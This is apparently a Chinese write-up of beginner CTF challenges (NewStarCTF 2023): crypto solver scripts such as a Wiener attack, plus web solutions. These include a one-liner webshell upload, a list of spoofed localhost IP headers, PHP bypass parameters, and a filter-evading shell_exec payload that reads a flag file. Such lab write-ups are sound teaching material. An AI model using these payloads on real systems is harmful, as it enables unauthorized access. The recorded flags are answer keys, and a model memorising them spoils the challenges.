[TOC]
crypto
brainfuck
题目
++++++++[>>++>++++>++++++>++++++++>++++++++++>++++++++++++>++++++++++++++>++++++++++++++++>++++++++++++++++++>++++++++++++++++++++>++++++++++++++++++++++>++++++++++++++++++++++++>++++++++++++++++++++++++++>++++++++++++++++++++++++++++>++++++++++++++++++++++++++++++<<<<<<<<<<<<<<<<-]>>>>>>>++++++.>----.<-----.>-----.>-----.<<<-.>>++..<.>.++++++.....------.<.>.<<<<<+++.>>>>+.<<<+++++++.>>>+.<<<-------.>>>-.<<<+.+++++++.--..>>>>---.-.<<<<-.+++.>>>>.<<<<-------.+.>>>>>++.直接在线解码
https://www.splitbrain.org/services/ook
flag{Oiiaioooooiai#b7c0b1866fe58e12}Caesar’s Secert
题目
kqfl{hf3x4w'x_h1umjw_n5_a4wd_3fed}随波逐流一把梭
flag{ca3s4r's_c1pher_i5_v4ry_3azy}Fence
题目
fa{ereigtepanet6680}lgrodrn_h_litx#8fc3随波逐流一把梭 分为两栏
flag{reordering_the_plaintext#686f8c03}Vigenère
题目
pqcq{qc_m1kt4_njn_5slp0b_lkyacx_gcdy1ud4_g3nv5x0}
le chiffre indéchiffrable一把梭
flag{la_c1fr4_del_5ign0r_giovan_batt1st4_b3ll5s0}babyrsa
题目
from Crypto.Util.number import *
from flag import flag
def gen_prime(n):
res = 1
for i in range(15):
res *= getPrime(n)
return res
if __name__ == '__main__':
n = gen_prime(32)
e = 65537
m = bytes_to_long(flag)
c = pow(m,e,n)
print(n)
print(c)
# 17290066070594979571009663381214201320459569851358502368651245514213538229969915658064992558167323586895088933922835353804055772638980251328261
# 14322038433761655404678393568158537849783589481463521075694802654611048898878605144663750410655734675423328256213114422929994037240752995363595脚本
直接分解n然后RSA
from Crypto.Util.number import *
import gmpy2
e = 65537
n = 17290066070594979571009663381214201320459569851358502368651245514213538229969915658064992558167323586895088933922835353804055772638980251328261
c = 14322038433761655404678393568158537849783589481463521075694802654611048898878605144663750410655734675423328256213114422929994037240752995363595
pq = [2217990919 ,2338725373 ,2370292207 ,2463878387 ,2706073949 ,2794985117 ,2804303069 ,2923072267 ,2970591037 ,3207148519 ,3654864131 ,3831680819 ,3939901243 ,4093178561 ,4278428893]
phi = 1
for i in pq:
phi *= i-1
d = gmpy2.invert(e,phi)
m = pow(c,d,n)
flag = long_to_bytes(int(m))
print(flag)flag{us4_s1ge_t0_cal_phI}Small d
题目
from secret import flag
from Crypto.Util.number import *
p = getPrime(1024)
q = getPrime(1024)
d = getPrime(32)
e = inverse(d, (p-1)*(q-1))
n = p*q
m = bytes_to_long(flag)
c = pow(m,e,n)
print(c)
print(e)
print(n)
c = 6755916696778185952300108824880341673727005249517850628424982499865744864158808968764135637141068930913626093598728925195859592078242679206690525678584698906782028671968557701271591419982370839581872779561897896707128815668722609285484978303216863236997021197576337940204757331749701872808443246927772977500576853559531421931943600185923610329322219591977644573509755483679059951426686170296018798771243136530651597181988040668586240449099412301454312937065604961224359235038190145852108473520413909014198600434679037524165523422401364208450631557380207996597981309168360160658308982745545442756884931141501387954248
e = 8614531087131806536072176126608505396485998912193090420094510792595101158240453985055053653848556325011409922394711124558383619830290017950912353027270400567568622816245822324422993074690183971093882640779808546479195604743230137113293752897968332220989640710311998150108315298333817030634179487075421403617790823560886688860928133117536724977888683732478708628314857313700596522339509581915323452695136877802816003353853220986492007970183551041303875958750496892867954477510966708935358534322867404860267180294538231734184176727805289746004999969923736528783436876728104351783351879340959568183101515294393048651825
n = 19873634983456087520110552277450497529248494581902299327237268030756398057752510103012336452522030173329321726779935832106030157682672262548076895370443461558851584951681093787821035488952691034250115440441807557595256984719995983158595843451037546929918777883675020571945533922321514120075488490479009468943286990002735169371404973284096869826357659027627815888558391520276866122370551115223282637855894202170474955274129276356625364663165723431215981184996513023372433862053624792195361271141451880123090158644095287045862204954829998614717677163841391272754122687961264723993880239407106030370047794145123292991433
脚本
维纳攻击一把嗦
import gmpy2
import libnum
def continuedFra(x, y):
"""计算连分数
:param x: 分子
:param y: 分母
:return: 连分数列表
"""
cf = []
while y:
cf.append(x // y)
x, y = y, x % y
return cf
def gradualFra(cf):
"""计算传入列表最后的渐进分数
:param cf: 连分数列表
:return: 该列表最后的渐近分数
"""
numerator = 0
denominator = 1
for x in cf[::-1]:
# 这里的渐进分数分子分母要分开
numerator, denominator = denominator, x * denominator + numerator
return numerator, denominator
def solve_pq(a, b, c):
"""使用韦达定理解出pq,x^2−(p+q)∗x+pq=0
:param a:x^2的系数
:param b:x的系数
:param c:pq
:return:p,q
"""
par = gmpy2.isqrt(b * b - 4 * a * c)
return (-b + par) // (2 * a), (-b - par) // (2 * a)
def getGradualFra(cf):
"""计算列表所有的渐近分数
:param cf: 连分数列表
:return: 该列表所有的渐近分数
"""
gf = []
for i in range(1, len(cf) + 1):
gf.append(gradualFra(cf[:i]))
return gf
def wienerAttack(e, n):
"""
:param e:
:param n:
:return: 私钥d
"""
cf = continuedFra(e, n)
gf = getGradualFra(cf)
for d, k in gf:
if k == 0: continue
if (e * d - 1) % k != 0:
continue
phi = (e * d - 1) // k
p, q = solve_pq(1, n - phi + 1, n)
if p * q == n:
return d
c = 6755916696778185952300108824880341673727005249517850628424982499865744864158808968764135637141068930913626093598728925195859592078242679206690525678584698906782028671968557701271591419982370839581872779561897896707128815668722609285484978303216863236997021197576337940204757331749701872808443246927772977500576853559531421931943600185923610329322219591977644573509755483679059951426686170296018798771243136530651597181988040668586240449099412301454312937065604961224359235038190145852108473520413909014198600434679037524165523422401364208450631557380207996597981309168360160658308982745545442756884931141501387954248
e = 8614531087131806536072176126608505396485998912193090420094510792595101158240453985055053653848556325011409922394711124558383619830290017950912353027270400567568622816245822324422993074690183971093882640779808546479195604743230137113293752897968332220989640710311998150108315298333817030634179487075421403617790823560886688860928133117536724977888683732478708628314857313700596522339509581915323452695136877802816003353853220986492007970183551041303875958750496892867954477510966708935358534322867404860267180294538231734184176727805289746004999969923736528783436876728104351783351879340959568183101515294393048651825
n = 19873634983456087520110552277450497529248494581902299327237268030756398057752510103012336452522030173329321726779935832106030157682672262548076895370443461558851584951681093787821035488952691034250115440441807557595256984719995983158595843451037546929918777883675020571945533922321514120075488490479009468943286990002735169371404973284096869826357659027627815888558391520276866122370551115223282637855894202170474955274129276356625364663165723431215981184996513023372433862053624792195361271141451880123090158644095287045862204954829998614717677163841391272754122687961264723993880239407106030370047794145123292991433
d=wienerAttack(e, n)
m=pow(c, d, n)
print(libnum.n2s(m).decode())flag{learn_some_continued_fraction_technique#dc16885c}babyxor
题目
from secret import *
ciphertext = []
for f in flag:
ciphertext.append(f ^ key)
print(bytes(ciphertext).hex())
# e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2脚本
c = bytes.fromhex('e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2')
m = 'flag'
print(c[0])
for i in range(len(c)):
print(chr(int(c[i]) ^ 143),end='')flag{x0r_15_symm3try_and_e4zy!!!!!!}babyencoding
题目
part 1 of flag: ZmxhZ3tkYXp6bGluZ19lbmNvZGluZyM0ZTBhZDQ=
part 2 of flag: MYYGGYJQHBSDCZJRMQYGMMJQMMYGGN3BMZSTIMRSMZSWCNY=
part 3 of flag: =8S4U,3DR8SDY,C`S-F5F-C(S,S<R-C`Q9F8S87T`base64,base32,uuencode
flag{dazzling_encoding#4e0ad4f0ca08d1e1d0f10c0c7afe422fea7c55192c992036ef623372601ff3a}Affine
题目
from flag import flag, key
modulus = 256
ciphertext = []
for f in flag:
ciphertext.append((key[0]*f + key[1]) % modulus)
print(bytes(ciphertext).hex())
# dd4388ee428bdddd5865cc66aa5887ffcca966109c66edcca920667a88312064脚本
from Crypto.Util.number import *
ciphertext_hex = 'dd4388ee428bdddd5865cc66aa5887ffcca966109c66edcca920667a88312064'
ciphertext_bytes = bytes.fromhex(ciphertext_hex)
print(ciphertext_bytes[0] - ciphertext_bytes[1])
a = ((ciphertext_bytes[1] - ciphertext_bytes[2]) * inverse((ord('l')-ord('a')) ,256)) % 256
print(a)
b = (ciphertext_bytes[0] - a*ord('f')) % 256
print(b)
flag = ''
for i in ciphertext_bytes:
flag += chr((inverse(a,256)*(i-b)) % 256)
print(flag) flag{4ff1ne_c1pher_i5_very_3azy}babyaes
题目
from Crypto.Cipher import AES
import os
from flag import flag
from Crypto.Util.number import *
def pad(data):
return data + b"".join([b'\x00' for _ in range(0, 16 - len(data))])
def main():
flag_ = pad(flag)
key = os.urandom(16) * 2
iv = os.urandom(16)
print(bytes_to_long(key) ^ bytes_to_long(iv) ^ 1)
aes = AES.new(key, AES.MODE_CBC, iv)
enc_flag = aes.encrypt(flag_)
print(enc_flag)
if __name__ == "__main__":
main()
# 3657491768215750635844958060963805125333761387746954618540958489914964573229
# b'>]\xc1\xe5\x82/\x02\x7ft\xf1B\x8d\n\xc1\x95i'脚本
from Crypto.Cipher import AES
from Crypto.Util.number import *
xor = 3657491768215750635844958060963805125333761387746954618540958489914964573229
enc_flag = b'>]\xc1\xe5\x82/\x02\x7ft\xf1B\x8d\n\xc1\x95i'
# 根据加密过程中的逻辑,key为32byte,iv为16byte,两者进行了异或运算,那么key的高128bit不会改变,那么通过将高128bit与输出后的后半部分进行异或运算就能还原iv 和 key了。
key_bytes = long_to_bytes(xor)[:16] * 2
iv = bytes_to_long(key_bytes) ^ xor
iv_bytes = long_to_bytes(iv)
aes = AES.new(key_bytes,AES.MODE_CBC,iv_bytes)
flag = aes.decrypt(enc_flag)
print(flag)
flag{firsT_cry_Aes}WEB
泄漏的秘密
扫描文件根目录
得到robots.txt www.zip
flag{r0bots_1s_s0_us3ful_4nd_www.zip_1s_s0_d4ng3rous}Begin of Upload
明显前端
直接禁用js然后上传一句话木马
蚁剑连接
flag{aa3b46bf-ee7e-49af-b98b-f45b79446145}ErrorFlask
根据提示error首先想办法让他报错,传参不是数字就行
报错之后
点击一下这个地方
flag{Y0u_@re_3enset1ve_4bout_deb8g}
Begin of HTTP
首先get给ctf传参
?ctf=111
查看源代码
post传参内容
base64解码得n3wst4rCTF2023g00000d
post传参
下面操做在BP上做
该power=ctfer
改User-Agent:NewStarCTF2023
改referer:newstarctf.com
加上X-Forwarded-For:127.0.0.1
不太行那我就上大招了
把这些表示本地得都粘上去
Client-IP: 127.0.0.1
Forwarded-For-Ip: 127.0.0.1
Forwarded-For: 127.0.0.1
Forwarded-For: localhost
Forwarded: 127.0.0.1
Forwarded: localhost
True-Client-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forward: 127.0.0.1
X-Forward: localhost
X-Forwarded-By: 127.0.0.1
X-Forwarded-By: localhost
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For-Original: localhost
X-Forwarded-For: 127.0.0.1
X-Forwarded-For: localhost
X-Forwarded-Server: 127.0.0.1
X-Forwarded-Server: localhost
X-Forwarded: 127.0.0.1
X-Forwarded: localhost
X-Forwared-Host: 127.0.0.1
X-Forwared-Host: localhost
X-Host: 127.0.0.1
X-Host: localhost
X-HTTP-Host-Override: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-Addr: localhost
X-Remote-IP: 127.0.0.1
Begin of PHP
绕过level1
数组绕过level2
数组绕过level3
绕过level4
level5无数字字母webshell
flag5=True?key1=s155964671a&key2=s214587387a&key4[]=1&key5=3000a
key3[]=1&flag5="/-_["^"{_*>"
R!C!E!
payload
password=114514&e[v.a.l=echo shell_exec('ca\t /fla*');
EasyLogin
弱口令
admin 000000
抓包
找到一个POST请求302的一个包
Misc
CyberChef’s Secret
题目
来签到吧!下面这个就是flag,不过它看起来好像怪怪的:-)
M5YHEUTEKFBW6YJWKZGU44CXIEYUWMLSNJLTOZCXIJTWCZD2IZRVG4TJPBSGGWBWHFMXQTDFJNXDQTA=base32
gprRdQCoa6VMNpWA1K1rjW7dWBgadzFcSrixdcX69YxLeKn8L然后base58
flag{Base_15_S0_Easy_^_^}机密图片
lsb一把梭
流量!鲨鱼!
首先导出流量里面所有HTTP包,然后找到
这个文件
Wm14aFozdFhjbWt6TldnMGNtdGZNWE5mZFRVelpuVnNYMkkzTW1FMk1EazFNemRsTm4wSwo=base64解码
ZmxhZ3tXcmkzNWg0cmtfMXNfdTUzZnVsX2I3MmE2MDk1MzdlNn0K再次base64
flag{Wri35h4rk_1s_u53ful_b72a609537e6}空白格
https://vii5ard.github.io/whitespace/
直接复制进去RUN
flag{w3_h4v3_to0_m4ny_wh1t3_sp4ce_2a5b4e04}压缩包们
手动修复压缩包
然后爆破密码
隐秘的眼睛
RE
easy_RE
直接拖进IDA
flag{we1c0me_to_rev3rse!!}
